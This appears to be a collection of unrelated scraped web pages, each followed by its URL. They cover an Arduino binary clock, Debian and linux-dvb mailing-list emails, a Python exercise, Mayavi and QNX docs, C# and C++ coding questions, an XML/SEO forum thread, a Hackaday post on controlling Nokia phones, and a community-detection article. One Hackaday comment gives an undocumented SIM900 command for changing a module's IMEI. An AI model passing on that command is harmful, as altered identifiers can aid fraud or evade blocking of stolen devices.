The first greedy (in terms of computation) algorithm based on modularity was introduced by Newman in 2004. He was already at the origin of the Girvan-Newman algorithm in 2002 which consists in progressively removing edges with high betweenness (likely to be between communities) from the network. Another method to detect communities is by simulating random walks inside the network. It is based on the principle that a random walker will tend to stay inside densely connected areas of the graph. That is the idea behind the walktrap algorithm, introduced by Pascal Pons and Matthieu Latapy in 2005. It also inspired the infomap algorithm created in 2008 by Martin Rosvall. However, these algorithms only consider one community per node, which might be a wrong hypothesis in some cases. Several papers on the subject base their models on overlapping communities (i.e. where nodes can belong to several communities). The clique percolation method, made popular by Cfinder (freeware for overlapping community detection) in 2005, is the most recognized method to detect overlapping communities. The concept is that a network is made of many cliques (subsets of nodes such that every two distinct nodes in the clique are adjacent) which overlap. One clique can thus belong to several communities. Jaewon Yang and Jure Leskovec also published a paper in 2013 for their own overlapping community detection algorithm called BigClam. The particularity of this algorithm is that it is very scalable (unlike the algorithms mentioned before) thanks to non-negative matrix factorization. The authors claim that contrary to common hypothesis, community overlaps are denser than the communities themselves, and that the more communities two nodes share, the more likely they are to be connected. You can find here and here reviews of these different methods. The issue at hand is to determine which algorithm we should use if we want to detect communities in a network. Is there one “best” algorithm? 
Or does it depend on the network we are studying and the aim of our study?

First, we have to establish the criteria on which we want to compare the algorithms. The most efficient way of evaluating a partition is to compare it to the communities we know exist in our network; these are called "ground-truth" communities. Several measures enable us to make that comparison, notably the normalized mutual information (NMI) and the F-Score.

There are two famous benchmark network generators for community detection algorithms: Girvan-Newman (GN) and Lancichinetti-Fortunato-Radicchi (LFR). Since it is difficult to obtain many instances of real networks whose communities are known, a solution is to generate networks with a built-in community structure. It is then possible to evaluate the performance of the algorithms (usually with the NMI). The most famous and basic generator (GN) was not acknowledged as a realistic option. Indeed, the networks generated are not representative of the heterogeneity found in real-life networks (in particular, all the nodes have approximately the same degree, when a "real" network should have a skewed degree distribution). A more realistic benchmark was then introduced (LFR), where the node degrees and community sizes are distributed according to a power law. You can read about these benchmark algorithms here and here.

However, the LFR benchmark doesn't consider overlapping communities, and generating large graphs could take some time depending on your computation capacity. This is why we are going to use real-life networks available in the Stanford large network dataset collection to build our benchmark. There are five networks with ground-truth communities (Amazon, DBLP, Orkut, Youtube and Friendster), but we won't be able to use the Friendster graph because of its volume.

To manipulate the data and the algorithms, we will use the python igraph library. Let's load the Amazon graph and try the fastgreedy community detection algorithm.
In this graph, the nodes are products, and a link is formed between two products if they are often co-purchased. For this algorithm, the graph needs to be undirected (no direction on the edges). It should take just under 15 minutes to get a result. As you can see, you get a list of the nodes' community ids.

import igraph as ig

g = ig.Graph.Read_Ncol('/Users/Lab/Documents/DonneesAmazon/com-amazon.ungraph.txt')
print 'number of nodes: ' + str(len(g.vs()))
print 'number of edges: ' + str(len(g.es()))

number of nodes: 334863
number of edges: 925872

Applying the fastgreedy algorithm:

g = g.as_undirected()
dendrogram = g.community_fastgreedy()
clustering = dendrogram.as_clustering()
membership = clustering.membership
print membership[0:30]

[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3]
More precisely, precision is the number of true positives divided by the total number of positives (among the nodes I have classified in a community, how many actually belong to that community?), and recall is the number of true positives divided by the number of true positives and false negatives (how many nodes did I correctly classify in one community compared to the total number of nodes in that community?). Let’s break down the performance evaluation method (see Stanford’s article for more details and here for the whole PerformanceFScore script). The first step is to randomly select a subgraph inside our original graph (a subgraph is made of at least two ground-truth communities).

Selection of a subgraph

#Here, we randomly select a node in our network to build a subgraph around it.
#A node must have at least two communities.
Com=[0]  #Communities of the node (dummy initialization).
while len(Com)<2:
    #A node is selected randomly.
    rand=randint(0,len(g.vs()))
    node=g.vs[rand]
    #We check if the node was classified in a community (if it exists in the ground-truth file).
    if node["name"] in nbComPerNode.keys():
        #We get the communities it belongs to.
        Com=nbComPerNode[node["name"]]
    else:
        continue

#In the ground-truth file, we take all the nodes that share at least one community with our original node.
GT={}
with open(FileGT,"r") as filee:
    for indx,line in enumerate(filee):
        if indx in Com:
            line = line.rstrip()
            fields = line.split("\t")
            nodes=[]
            for col in fields:
                nodes.append(col)
            GT[indx]=nodes

#We transform the node names into node indices to create the subgraph with igraph.
ndsSG=set()
for com in Com:
    temp=[nomIndice[k] for k in GT[com]]
    ndsSG.update(temp)
ndsSG.add(node.index)
subgraph=g.subgraph(ndsSG)

We apply the community detection algorithm of our choice on the subgraph.

#We apply the algorithm.
commClus=ChoixAlgo(algo,subgraph,commClus,path,SnapPath)

We compute the F-Score between all detected communities and all ground-truth communities and keep the highest (we do that as many times as there are detected communities and take the mean of the highest F-Scores). We compute the F-Score between all ground-truth communities and detected communities and keep the highest (we do that as many times as there are ground-truth communities and take the mean of the highest F-Scores).

Computation of the F-Score

def calculFScore(i,j):
    i=[int(x) for x in i]
    j=[int(x) for x in j]
    inter=set(i).intersection(set(j))
    precision=len(inter)/float(len(j))
    recall=len(inter)/float(len(i))
    if recall==0 and precision==0:
        fscore=0
    else:
        fscore=2*(precision*recall)/(precision+recall)
    return fscore

We take the mean of the two mean F-Scores.

#This gives the F-Score on one subgraph
measure=(fscore1+fscore2)/2

We repeat the operation on another subgraph. In the end, we take the mean of the F-Scores on all the subgraphs. However, the raw F-Scores you get this way are quite low, which is why we normalize the scores between 0 and 1. We selected five algorithms to compare here: snap’s infomap, igraph’s infomap, igraph’s fastgreedy, snap’s cpm and snap’s BigClam. This way we can compare the most popular algorithms for non-overlapping communities with algorithms for overlapping communities. For all of our graphs we get the same ranking. Igraph’s infomap gets the best F-Score, closely followed by snap’s infomap. Then come, close behind and in this order: BigClam, cpm and fastgreedy. However, we have to keep in mind that the F-Score favors big communities and that infomap tends to create big communities.
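To make the computation concrete, here is the same F-Score logic as in calculFScore applied to a tiny pair of communities (a standalone toy sketch, not the benchmark script itself):

```python
def f_score(truth, detected):
    """F-Score between one ground-truth community and one detected community:
    the harmonic mean of precision and recall over the node sets."""
    truth, detected = set(truth), set(detected)
    inter = truth & detected
    if not inter:
        return 0.0
    precision = len(inter) / len(detected)
    recall = len(inter) / len(truth)
    return 2 * precision * recall / (precision + recall)

# The detected community shares 2 of its 3 nodes with the ground truth:
print(f_score([2, 3, 4], [1, 2, 3]))  # precision = recall = 2/3, so F = 2/3
```

In the benchmark, this pairwise score is then maximized over candidate communities and averaged in both directions, as described above.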
Here is an example of the ranking we get on the Amazon graph: This result is surprising, since we have some graphs with a lot of overlaps (like the Amazon graph, which has an overlap rate of 0.95), but the overlapping community detection algorithms don’t work better on it than on the DBLP graph, which has an overlap rate of 0.35. As a reminder, in the DBLP graph the nodes are authors of research papers in computer science, and two authors are linked if they wrote at least one paper together. It means that even if a graph does have a lot of overlapping communities, the dedicated algorithms are not able to identify these overlaps correctly enough to perform better than infomap (at least on our test graphs). However, it is acknowledged that the various types and structures of graphs in real life affect the results of the algorithms. Indeed, the algorithm we want to use has to be adapted to the structure of our graph. Depending on the field or the context we are studying, we can encounter many different structures in graphs. If we take subgraphs of the Youtube and DBLP graphs, we can tell that their structures are quite different: indeed, the Youtube subgraph has a clear tree structure whereas the DBLP subgraph has more of a wheel structure. What is the impact of one structure or the other on the algorithms’ performance? To understand that, we created a small graph from twitter data on the subject of nuclear power (the snap graphs are too big to easily apply our algorithms and create visualizations). The nodes (998 in total) are users and the edges are retweets. The structure is identical to the Youtube subgraph’s (tree).
Let’s visualize the results of different community detection algorithms on this graph: Judging only by the visualizations, since we don’t have the ground-truth communities, infomap and fastgreedy seem to work well on this graph structure; the only difference is that whereas infomap creates one big community (in red), fastgreedy tends to break it into little communities. However, as the graph grows in size, the algorithms’ behaviour reverses: fastgreedy struggles more and more to detect smaller communities, whereas infomap becomes a lot more precise. Here, which algorithm to use depends on the aim of your study: in the long term, fastgreedy won’t be very good at detecting small communities and will tend to merge them together (this is called the resolution limit), but you might want bigger, more global communities. Infomap is better at identifying smaller groups of people who follow one particular leader, so it’s the way to go if you want a precise community detection (which is usually better). A final visualization of the infomap result, in JavaScript, is available later in the article; there were too many nodes to simply process with matplotlib. On the contrary, we can see that the overlapping community detection algorithms BigClam and cpm don’t work at all on our twitter graph. Most of the nodes are not classified (nodes in white; the black nodes belong to several communities). The reason for that is the way these algorithms detect the communities. The cpm (clique percolation) algorithm tries to find cliques inside the graph (the number of nodes per clique, k, is a parameter of the algorithm). The issue with this graph is that there are no cliques made of more than two nodes, and there are very few possibilities of overlap between the cliques, which makes it very difficult for the algorithm to identify them (even more so if k>2).
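This point about missing cliques is easy to check directly. The brute-force helper below is our own (it is only practical for toy graphs) and confirms that a tree-shaped graph contains no clique bigger than a single edge, leaving clique percolation nothing to percolate:

```python
from itertools import combinations

def has_k_clique(edges, k):
    """Return True if any k nodes of the graph are all pairwise connected.
    Brute force over node subsets: fine for tiny illustration graphs only."""
    edge_set = {frozenset(e) for e in edges}
    nodes = {n for e in edges for n in e}
    return any(all(frozenset(pair) in edge_set for pair in combinations(group, 2))
               for group in combinations(sorted(nodes), k))

tree = [(0, 1), (0, 2), (1, 3), (1, 4)]      # tree structure, like the twitter graph
wheelish = [(0, 1), (1, 2), (0, 2), (2, 3)]  # contains a triangle (3-clique)

print(has_k_clique(tree, 3))      # False: no triangle for percolation to start from
print(has_k_clique(wheelish, 3))  # True
```

With k=3 or more, a retweet tree therefore gives the algorithm literally nothing to work with, which matches the empty result observed above.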
We also tried the kclique algorithm from the networkx library (which is based on the clique percolation method), but with k=2 the algorithm classifies almost all the nodes in one community, and with k>2 it gives the same kind of result as cpm. The BigClam algorithm tries to find overlaps between communities initiated with locally minimal neighborhoods, but given the structure of our graph, these initialization communities should have very little overlap. The twitter graph is a good example of a structure that is not suited to these overlapping community detection algorithms. A solution would be to change the way we select our twitter data to get a more appropriate structure. For example, we could consider studying the replies or the mentions between users. Let’s take a subgraph of our DBLP test graph, where the structure is very different from the twitter graph, and observe the result of the cpm algorithm: This result shows that the clique percolation method works way better on a wheel structure, where overlaps are more likely and more easily identifiable. However, infomap still had a better performance overall, in the sense of the F-Score, on this graph. Infomap and fastgreedy also seem to work pretty well on the twitter graph, so we could just use those instead of overlapping algorithms. Once you have applied your community detection algorithm on your graph and you are satisfied with the result, it can be very interesting to build an interactive visualization. It helps materialize your community detection and gives a global point of view on your communities and their members. The igraph library has a plot function for this task, but the visualization is not interactive. However, there are different JavaScript libraries that offer very interesting interactive templates.
D3.js has a force-layout graph template where you can play with the nodes and move them around, but Vis.js has a very complete template for community detection visualization that we tried with our twitter graph. All we had to do was adapt our data to the template (it takes json or js files) and use bootstrap.js to add descriptions for the communities. The visualization is available on the kernix github here, and the original template here. Here are several screenshots: To conclude this post, community detection in complex networks is still a very challenging field. Many algorithms have been created to efficiently identify communities inside large networks, infomap being recognized as the most reliable. However, correctly evaluating the performance of these algorithms is still an issue, especially in the case of overlapping communities. The only way we can appreciate the quality of an algorithm is to test it on a graph with a built-in community structure, or where we know the ground-truth communities; and even then, there isn’t any implemented measure for overlapping communities. Maybe completing community detection on large graphs with semantic analysis could be a way to have a little more control over the results. We still saw with the example of the twitter graph that some algorithms yield pretty good results on small graphs (given that we use the algorithms best suited to the graph’s structure), and in this case the graph is small enough to build a nice visualization of our result and get an idea of the quality of the partition.
https://www.kernix.com/article/community-detection-in-social-networks/
CC-MAIN-2020-24
refinedweb
3,072
50.26
Ever since the 2013 BUILD conference, a huge number of people have attempted to integrate peripherals into their modern applications – and of all the devices we can plug into our computers, one has stood out as the prized device people want to connect. The Dream Cheeky Thunder Missile Launcher is a $35 novelty toy available from various retailers around the world. The Thunder is simple in its construction – it's a USB-based, air-powered missile launcher that allows you to sight and fire foam darts at unsuspecting people hovering in your immediate vicinity. The device has been so popular with geeks globally that it has even featured in The Big Bang Theory. Aside from its credibility with those of us that frequent code, one of the other exciting features of the Thunder is its driver stack. Instead of using a proprietary driver in a similar fashion to the OWI-535 robotic arm, the device actually leverages an existing Windows standard as a HID (human interface device), in much the same way as a keyboard and mouse. So why is this exciting for us as developers? Firstly, because we don't need to do anything with the OS to install or configure the device; and also, as it uses a standard Windows driver which has been ported to the ARM stack, the device will also work on a Windows RT device such as a Surface! Plugging in the device and having Windows recognize it is only a small part of our solution. As app developers we want to leverage this device from our modern application, and allow our users to start shooting each other. Luckily, Windows 8.1 provides us with support for such a dilemma by introducing the Windows.Devices.HumanInterfaceDevice namespace. So let's spend a few minutes looking at the code required to start firing our missiles. As with any modern application that wants to go beyond some standard UI prompts, we need to ask permission from our user to access the device.
This is a security feature that prevents apps from becoming malware. In Windows 8.1, as per Windows 8, we do this via the package.appxmanifest file, and we leverage the namespace extensions that allow us to reference the new 8.1 capabilities. Currently the Visual Studio manifest editor doesn't support these changes, so open up your file in a text editor and add the following lines:

<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/2010/manifest"
         xmlns:m2="http://schemas.microsoft.com/appx/2013/manifest">
  <Capabilities>
    ...
    <m2:DeviceCapability Name="humaninterfacedevice">
      <m2:Device Id="any">
        <m2:Function Type="usage:0001 0010" />
      </m2:Device>
    </m2:DeviceCapability>
  </Capabilities>
</Package>

In this example I've been a little broader in the request I am making to the user. Specifically, instead of defining a product, I am asking for access to any HID device which matches the usage page and usage ID included. I've done this deliberately to show the difference between an app looking for one particular device vs. a range of devices. If you did want to be a little more granular, you could specify the VID and PID as per my USB example instead of the any argument. Once we have declared our intention to access the device, we need to wire up some code to find out if the device is attached to our machine. Again, just to show some contrast to my last post, I'm going to do this using a DeviceWatcher. If I wanted a moment-in-time view of whether the device is connected, I could use the Windows.Devices.Enumeration technique I demonstrated in my robot arm article. Instead I have opted to use a watcher, using a method on the same object, Windows.Devices.Enumeration.DeviceInformation. A watcher monitors the device manager on the machine for devices being added, and will raise an event if it finds a device. This gives your app the functionality to deal with devices being added or removed at any time in the life cycle.
The code we need to create a watcher is:

const ushort vid = 8483;
const ushort pid = 4112;
const ushort uid = 16;
const ushort uPage = 1;

var deviceWatcher = DeviceInformation.CreateWatcher(
    HidDevice.GetDeviceSelector(uPage, uid, vid, pid));

deviceWatcher.Added += (s, a) => Dispatcher.RunAsync(
    CoreDispatcherPriority.Normal,
    async () =>
    {
        // .. do something here ..
    });

deviceWatcher.Start();

This is very similar to any device connectivity code. We are creating an AQS (query statement) string using a helper method on Windows.Devices.HumanInterfaceDevice.HidDevice by passing in the vendor ID, product ID, usage ID, and usage page values. The AQS is then used by the watcher to find any devices connected to the machine, which causes the event to be fired. One important piece of code to note is the dispatcher in the event handler. This is present because when the device is added and you try to connect, a window appears in the UI asking for permission from the user. Therefore any code used to connect to the device needs to run on the UI thread. To actually open up a connection to the device, it's a matter of calling one async method on the Windows.Devices.HumanInterfaceDevice.HidDevice object:

_hidDevice = await HidDevice.FromIdAsync(a.Id, FileAccessMode.ReadWrite);

The FromIdAsync method takes two arguments: the device ID (returned as part of the DeviceInformation from the watcher event), and an enumerated FileAccessMode to specify the connection type – which in our case is ReadWrite, since we want to pass commands to the device. Now we have an active connection to the device, so we can start sending data to it.
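As an aside, the control payloads built in the C# examples that follow are just small fixed-length byte arrays, so the framing is easy to mirror in plain Python for readers without a Windows machine. The byte values come from the article's LED example; the `led_report` helper name, and the assumption that the third byte carries the on/off state, are ours:

```python
# The Thunder expects a 9-byte output report: byte 0 is the report id,
# and the remaining bytes carry the command payload.
def led_report(on):
    """Build the LED toggle report. The {0, 3, 1, ...} ON pattern is taken
    from the article; treating the third byte as the state is an assumption."""
    state = 1 if on else 0
    return bytes([0, 3, state, 0, 0, 0, 0, 0, 0])

LED_ON = led_report(True)
print(len(LED_ON), list(LED_ON[:3]))  # 9 [0, 3, 1]
```

On the Windows side, such a 9-byte buffer is exactly what gets assigned to `report.Data` before calling `SendOutputReportAsync`.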
HID devices have fairly small and easy payloads to transmit – if you imagine a keyboard HID device, it simply sends the corresponding keypress data, which is all relatively small. Being a similar device type, the Thunder expects simple small payloads (especially in comparison to the USB robotic arm), which correspond to up, down, left, right and fire. To send such data, we simply use a byte[] and send it out in an OutputReport object. Luckily another helper method creates the object for us, so we just need to append our payload and send the data using code similar to this:

private async Task SendOutputMessage(byte[] message)
{
    if (_hidDevice != null)
    {
        var report = _hidDevice.CreateOutputReport();
        report.Data = message.AsBuffer();
        await _hidDevice.SendOutputReportAsync(report);
    }
}

And that is it! Using those few lines of code we have an active connection to the USB Thunder missile launcher and can start sending commands. Here is how we would toggle the LED on:

var LED_ON = new byte[] { 0, 3, 1, 0, 0, 0, 0, 0, 0 };
await SendOutputMessage(LED_ON);

In the meantime, have fun with your hardware hacking!

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
https://www.codeproject.com/Articles/659380/Connecting-the-Dream-Cheeky-Thunder-Missile-Launch?PageFlow=FixedWidth
There are several tools available to monitor and inspect Celery clusters. This document describes some of these, as well as features related to monitoring, like events and broadcast commands. celery can also be used to inspect and manage worker nodes (and to some degree tasks). To list all the commands available do:

$ celery help

or to get help for a specific command do:

$ celery <command> --help

status: List active nodes in this cluster

$ celery status

result: Show the result of a task.

purge: Purge messages from all configured task queues.

$ celery purge

Warning: There is no undo for this operation, and messages will be permanently deleted!

inspect active: List active tasks

$ celery inspect active

These are all the tasks that are currently being executed.

inspect scheduled: List scheduled ETA tasks

$ celery inspect scheduled

These are tasks reserved by the worker because they have the eta or countdown argument set.

inspect reserved: List reserved tasks

$ celery inspect reserved

This will list all tasks that have been prefetched by the worker and are currently waiting to be executed (it does not include tasks with an eta).

inspect revoked: List history of revoked tasks

$ celery inspect revoked

inspect registered: List registered tasks

$ celery inspect registered

inspect stats: Show worker statistics (see Statistics)

$ celery inspect stats

control enable_events: Enable events

$ celery control enable_events

control disable_events: Disable events

$ celery control disable_events

migrate: Migrate tasks from one broker to another (EXPERIMENTAL).

$ celery migrate redis://localhost amqp://localhost

This command will migrate all the tasks on one broker to another. As this command is new and experimental you should be sure to have a backup of the data before proceeding.

Note: All inspect and control commands support a --timeout argument; this is the number of seconds to wait for responses. You may have to increase this timeout if you’re not getting a response due to latency.
By default the inspect and control commands operate on all workers. You can specify a single worker, or a list of workers, by using the –destination argument:

$ celery inspect -d w1,w2 reserved
$ celery control -d w1,w2 enable_events

Flower is a real-time web based monitor and administration tool for Celery. Its features include an HTTP API and OpenID authentication.

Screenshots: …

You can use pip to install Flower:

$ pip install flower

Running the flower command will start a web-server that you can visit:

$ celery flower

The default port can be changed using the –port argument.

celery events is a simple curses monitor displaying task and worker history:

$ celery events

You should see a screen like: …

celery events is also used to start snapshot cameras (see Snapshots):

$ celery events --camera=<camera-class> --frequency=1.0

and it includes a tool to dump events to stdout:

$ celery events --dump

For a complete list of options use --help:

$ celery events --help

If you’re using RabbitMQ you can manage queues with rabbitmqctl, e.g.:

$ rabbitmqctl list_queues -p my_vhost …

Finding the number of tasks in a queue:

$ rabbitmqctl list_queues name messages messages_ready \
    messages_unacknowledged

Here messages_ready is the number of messages ready for delivery (sent but not received), and messages_unacknowledged is the number of messages that have been received by a worker but not yet acknowledged.

If you’re using Redis as the broker, you can monitor the Celery cluster using the redis-cli(1) command to list lengths of queues. Note that this does not affect the monitoring events used by e.g. Flower, as Redis pub/sub commands are global rather than database based.

celery_task_states: Monitors the number of tasks in each state (requires celerymon).

The worker has the ability to send a message whenever some event happens. These events are then captured by tools like Flower and celery events to monitor the cluster:

$ celery events -c myapp.Camera --frequency=2.0

Cameras can be useful if you need to capture events and do something with those events at an interval. For real-time event processing you should use celery.events.Receiver directly, like in Real-time processing.
Here is an example camera, dumping the snapshot to screen:

from pprint import pformat

from celery.events.snapshot import Polaroid

class DumpCam(Polaroid):

    def on_shutter(self, state):
        if not state.event_count:
            # No new events since last snapshot.
            return
        print('Workers: {0}'.format(pformat(state.workers, indent=4)))
        print('Tasks: {0}'.format(pformat(state.tasks, indent=4)))
        print('Total: {0.event_count} events, {0.task_count} tasks'.format(state))

See the API reference for celery.events.state to read more about state objects. Now you can use this cam with celery events by specifying it with the -c option:

$ celery events -c myapp.DumpCam --frequency=2.0

To process events in real-time you need the following:

- An event consumer (this is the Receiver)
- A set of handlers called when events come in. You can have different handlers for each event type, or a catch-all handler can be used (‘*’)
- State (optional)

celery.events.State is a convenient in-memory representation of tasks and workers in the cluster that is updated as events come in. It encapsulates solutions for many common things, like checking if a worker is still alive (by verifying heartbeats), merging event fields together as events come in, and making sure timestamps are in sync.

Event reference: this list contains the events sent by the worker, and their arguments.

task-sent: Sent when a task message is published and the CELERY_SEND_TASK_SENT_EVENT setting is enabled.

task-received: Sent when the worker receives a task.

task-started: Sent just before the worker executes the task.

task-succeeded: Sent if the task executed successfully. Runtime is the time it took to execute the task using the pool (starting from when the task is sent to the worker pool, and ending when the pool result handler callback is called).

task-failed: Sent if the execution of the task failed.

task-revoked: Sent if the task has been revoked (note that this is likely to be sent by more than one worker); the signum field is set to the signal used, and expired is set to true if the task expired.

task-retried: Sent if the task failed, but will be retried in the future.
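The handler set described above (one handler per event type, plus an optional ‘*’ catch-all) boils down to a small dispatch rule. The sketch below is our own illustration of that rule and does not use Celery’s API; it needs no broker to run:

```python
# Minimal dispatch logic mirroring how an event consumer routes events:
# a handler registered for the exact event type wins; otherwise the
# '*' catch-all handler (if any) is used.
def dispatch(handlers, event):
    handler = handlers.get(event['type'], handlers.get('*'))
    if handler is not None:
        return handler(event)

seen = []
handlers = {
    'task-failed': lambda ev: seen.append(('FAILED', ev['uuid'])),
    '*': lambda ev: seen.append(('OTHER', ev['type'])),
}

dispatch(handlers, {'type': 'task-failed', 'uuid': 'abc123'})
dispatch(handlers, {'type': 'worker-heartbeat'})
print(seen)  # [('FAILED', 'abc123'), ('OTHER', 'worker-heartbeat')]
```

A real consumer would pass a similar handler mapping to celery.events.Receiver and let the catch-all keep a State object up to date.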
worker-online: The worker has connected to the broker and is online.

worker-heartbeat: Sent every minute; if the worker has not sent a heartbeat in 2 minutes, it is considered to be offline.

worker-offline: The worker has disconnected from the broker.
http://celery.readthedocs.org/en/latest/userguide/monitoring.html
Bump to 0.7.1 please. :)

* Fixed SUID security vulnerability by validating success of seteuid/setreuid

Related security advisories describing the vulnerability:
* CVE-2006-2916 - artswrapper
* CVE-2006-4447 - X.Org

*** Bug 140937 has been marked as a duplicate of this bug. ***

sound/gnome, please provide an updated ebuild for this.

I have a compilation error with dev-scheme/guile-1.8.1-r1, even with USE="deprecated discouraged". @scheme: any idea about that?
[ebuild R ] dev-scheme/guile-1.8.1-r1 USE="deprecated discouraged elisp networking nls regex threads -debug -debug-freelist -debug-malloc" I really have no clue on how to fix that :/ the page seems to imply that guile-1.6 is needed. ok, if upgrading doesnt work, we need to backport the patch. i had a quick look and this should do the job: thanks stefan for the help, but older version are unfortunately affected by bug #131751 (and most likely guile incompatibilities also) I've commited 0.7.1 to the tree, this one depends on guile 1.6*, so I've pmasked it to not cause up/downgrades of guile. in guile-1.8 ebuild there are those lines : # Guile seems to contain some slotting support, /usr/share/guile/ is slotted, but there are lots of collisions. Most in /usr/share/libguile. Therefore I'm slotting this in the same slot as guile-1.6* for now. SLOT="12" so perhaps if scheme wants to help there, by either taking care of the b0rkage that has caused guile bump or by slotting it properly... I've only pmasked beast 0.7.1, feel free to pmask older versions also as imho they are broken. (In reply to comment #8) > so perhaps if scheme wants to help there, by either taking care of the b0rkage > that has caused guile bump or by slotting it properly... what borkage are you referring to that I could fix? I'd love to slot guile-1.8 separately, but I'm not sure it's possible. > what borkage are you referring to that I could fix? I'd love to slot guile-1.8 > separately, but I'm not sure it's possible. bah I've not managed to compile beast with guile 1.8. Try it, it's in the tree under pmask, you're probably much more able than I am to deal with guile. I've tried it. The beast developers have their work cut out for them I think. fixes for beast to compile with guile-1.8 which will be included in the next release: Any news on this one? 
Thanks marijn for the help here, beast 0.7.1 should be fine now, Adding arches as I suppose 0.7.1 will have to go stable and older versions will have to be removed. Thx Alexis. Updating whiteboard. TEST: test -x "/usr/bin/bsescm-0.7.1" Failed to verify installation of executable: /usr/bin/bsescm-0.7.1 make[1]: *** [check-installation] Error 1 make[1]: Leaving directory `/var/tmp/portage/media-sound/beast-0.7.1/work/beast-0.7.1/shell' make: *** [check-recursive] Error 1 I assume the check should be disabled. [ebuild N ] media-sound/beast-0.7.1 USE="mad -debug -static" Back to ebuild for now. Alexis please provide an updated ebuild. very annoying beast ;) 26 Mar 2007; Alexis Ballier <aballier@gentoo.org> +files/beast-0.7.1-noinstalltest.patch, beast-0.7.1.ebuild: Dont test if files are installed as they are not at the time we run src_test (In reply to comment #18) > very annoying beast ;) > > 26 Mar 2007; Alexis Ballier <aballier@gentoo.org> > +files/beast-0.7.1-noinstalltest.patch, beast-0.7.1.ebuild: > Dont test if files are installed as they are not at the time we run src_test So I cc arches again. x86 stable Thx Alexis and Christian for the quick response. Created attachment 114669 [details] compile-failure on ppc Doesn't compile on ppc. hmmm which linux-headers version do you have ? In which file is SIGTRAP defined ? (In reply to comment #23) > hmmm which linux-headers version do you have ? =sys-kernel/linux-headers-2.6.17-r2 > In which file is SIGTRAP defined ? /usr/include/asm/signal.h Ok I've been able to track and reproduce this error by compiling a cross toolchain and reading cpp output (ouch), it seems that there is a problem in glib headers : /usr/include/glib-2.0/glib/gbacktrace.h line 55 (glib 2.12.11): #else /* !__i386__ && !__alpha__ */ # define G_BREAKPOINT() G_STMT_START{ raise (SIGTRAP); }G_STMT_END #endif /* __i386__ */ but this file never includes signal.h on those non x86{,_64} nor alpha arches. 
while this could be fixed by including signal.h in any file using G_BREAKPOINT, I tend to think that's it's a glib bug. what do you think, should I just patch beast to resolve this security issue asap and then let the gnome team fix that or wait for a fix from the gnome team ? Thx Alexis. Since this appears to be suid root I would prefer a fix asap and the let the gnome ppl fix their error afterwards. then lets go : 30 Mar 2007; Alexis Ballier <aballier@gentoo.org> +files/beast-0.7.1-signalheader.patch, beast-0.7.1.ebuild: Include signal.h to workaround glib not including it causing compile failures on ppc (In reply to comment #27) > then lets go : > 30 Mar 2007; Alexis Ballier <aballier@gentoo.org> > +files/beast-0.7.1-signalheader.patch, beast-0.7.1.ebuild: > Include signal.h to workaround glib not including it causing compile > failures on ppc Thanks, ppc stable. I've never used BEAST but fail to see how you're going to escalate privileges unless you find another vulnerability in BEAST. hlieberman/Sound/gtk/Security do you know of any way of using this to gain root privileges without another vuln? sound or gnome: could someone explain why this app need setuid? Is it really necessary? according to this: It's just to get a -20 priority... I really don't see the point in doing this :/ Is it a kind of safety net to prevent jitters in case the box get overloaded? please advise. I don't personally use beast; but I assume, based on past experience with people using sound systems like JACK, that it is setuid root so that it can set itself to SCHED_FIFO (or SCHED_RR). There are workarounds for those to not need root; maybe Gentoo already does it for JACK? If so, beast could be modified to use that, or maybe just configured to use it. 200704-22, thanks everybody. Sorry for the delay.
https://bugs.gentoo.org/show_bug.cgi?id=163146
15 December 2008 22:38 [Source: ICIS news] NEW YORK (ICIS news)--German specialty chemicals producer Evonik Industries and automobile maker Daimler now own stakes in a company that makes lithium-ion batteries, the companies said on Monday. As part of the deal, Daimler has taken a 49.9% interest in Li-Tec Vermogensverwaltung, a Germany-based developer of lithium-ion batteries. The partners seek to engage a third shareholder with expertise in electrical and electronic systems integration, the official said. Evonik and Daimler also plan to form a joint venture focused on the development and production of batteries and battery systems for use in both passenger cars and commercial vehicles. Daimler will hold 90 percent of the joint venture, the official said. Financial terms were not disclosed. The capacity available at Li-Tec and the joint venture will initially concentrate on the needs of Daimler, but the sale of cells and battery systems to third parties is also planned for the longer term, according to Evonik. “Evonik is the only company that can actually bring about commercial series production of battery cells of this kind,” said Werner Muller, CEO of Evonik. In recent years, Evonik has invested about €80m ($107m) in lithium-ion battery technology, according to the company. ($1 = €0.75)
http://www.icis.com/Articles/2008/12/15/9179586/german-evonik-daimler-to-develop-lithium-ion-batteries.html
A Tribute To The PC Engine

I love this console. How successful will its Mini version be?

Nintendo started it all. In November 2016, they took their 30-year-old Entertainment System, turned it on its head, and released the Classic: a working miniature of the original console with 30 built-in games from the vast original library, and a modern software interface which felt right at home in the 21st century. And it flew off the shelves. A year later, they tried it again with the Super NES. Same formula (driven by the same hardware internals), same great results, especially as far as Nintendo’s finance department is concerned. The systems sold a combined 10 million units by the end of Q2 2018 ¹. Following this success story, a bunch of other players jumped onto the retro-nostalgic bandwagon hoping for a piece of the pie, with varying degrees of success. How can we forget Sony’s king of the bargain bin, the PlayStation Classic? A much loved system back in the day which performed very badly in its nostalgic reissue, mostly due to a dubious game selection and emulation issues. The latest release in this category is actually from Nintendo’s archenemy from back in the day, Sega, who is trying their hand at a mini Genesis/Mega Drive. However, much has already been written about the Genesis, both in its original form and in its miniaturized version, in the lead-up to its release in mid-September 2019. Here, I want to take you on a journey of discovery for a far more obscure system, the PC Engine/TurboGrafx, in preparation for its return (in mini form) in March 2020.

A bit of history

The original PC Engine was released in Japan in 1987 by NEC and Hudson to great success. It was the first console of the 16-bit era in a world dominated by Nintendo and their 8-bit Famicom/NES, which was outselling its closest competitors at a ratio of 3 units to 1 ².
